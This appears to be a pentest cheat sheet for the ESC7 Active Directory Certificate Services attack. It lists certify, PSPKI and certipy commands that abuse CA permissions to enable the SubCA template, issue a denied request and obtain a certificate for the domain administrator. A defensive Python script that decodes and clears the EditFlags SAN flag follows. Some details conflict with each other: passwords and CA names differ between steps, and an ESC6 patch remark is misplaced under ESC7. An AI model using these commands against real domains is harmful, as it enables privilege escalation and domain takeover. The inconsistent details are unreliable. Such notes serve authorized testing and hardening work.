
ESC7

Vulnerable Certificate Authority access control: two sets of CA permissions pose a security risk when held by a low-privileged principal:

  • ManageCA (CA Administrator)
  • ManageCertificates (Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set: if the value returned is 1376590, the flag is set.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access

ManageCA

A principal holding ManageCA can manipulate CA settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, which permits SAN specification in any template, a critical aspect of domain escalation.

Windows

Attack 1

The ESC6 attack was patched in May 2022. Note: toggling the flag has no effect until the CA service (CertSvc) is restarted; ManageCA users have the right to restart it, but cannot do so remotely.

  1. Request a certificate from a template that requires manager approval
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
  2. Import the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
  3. Approve the pending request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
  4. Download the issued certificate
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336

Attack 2

This attack only requires the ManageCA permission. It also needs the Manage Certificates permission and the SubCA certificate template to be enabled, but both can be granted/enabled by a principal with ManageCA.

  1. Grant Manage Certificates access (optional, if not already held)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
  2. Enable the SubCA certificate template (optional, if not already enabled)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
  3. Request a certificate based on the SubCA template (the request is denied and left as a failed request)
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
  4. Issue the failed request
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
  5. Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785

ManageCA, Manage Certificates and SubCA

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell (1114446 is the default EditFlags value with the SAN flag cleared; CertSvc must be restarted afterwards for the change to take effect)

# $ConfigReader is assumed to be a PSPKI CA registry configuration object already connected to the target CA
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
$ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
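As an added defensive check (not part of the original notes), the following Python decodes the EditFlags value returned by the certutil query above, reports whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set, and computes the value to write back when disabling it. The flag bit values are taken from certsrv.h (only a subset is listed), and the certutil output is a constructed sample.

```python
import re

# Subset of EditFlags bits from certsrv.h: the bits present on a default CA
# plus the ESC6/ESC7-relevant SAN flag. Other bits are reported as UNKNOWN.
EDIT_FLAGS = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00100000: "EDITF_ENABLECHASECLIENTDC",
}
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# Constructed sample of `certutil -getreg policy\EditFlags` output for a CA
# where the SAN flag has been enabled on top of the default flags.
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\lab-LAB-DC-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
CertUtil: -getreg command completed successfully.
"""


def parse_edit_flags(certutil_output: str) -> int:
    """Extract the EditFlags DWORD (hex and decimal must agree) from certutil output."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)\s*\((\d+)\)", certutil_output)
    if not m:
        raise ValueError("EditFlags value not found in certutil output")
    hex_val, dec_val = int(m.group(1), 16), int(m.group(2))
    if hex_val != dec_val:
        raise ValueError("hex and decimal EditFlags values disagree")
    return hex_val


def decode_edit_flags(value: int) -> list:
    """Names of known flags set in value (lowest bit first), plus any unknown remainder."""
    names = [name for bit, name in sorted(EDIT_FLAGS.items()) if value & bit]
    unknown = value & ~sum(EDIT_FLAGS)
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


def san_flag_set(value: int) -> bool:
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 is set (the ESC6 condition)."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)


def remediated_value(value: int) -> int:
    """EditFlags with the SAN flag cleared: the value to write back via SetConfigEntry."""
    return value & ~EDITF_ATTRIBUTESUBJECTALTNAME2


if __name__ == "__main__":
    v = parse_edit_flags(SAMPLE_CERTUTIL_OUTPUT)
    print(f"EditFlags = 0x{v:x} ({v}): {', '.join(decode_edit_flags(v))}")
    if san_flag_set(v):
        print(f"SAN flag set; write EditFlags {remediated_value(v)} and restart CertSvc")
```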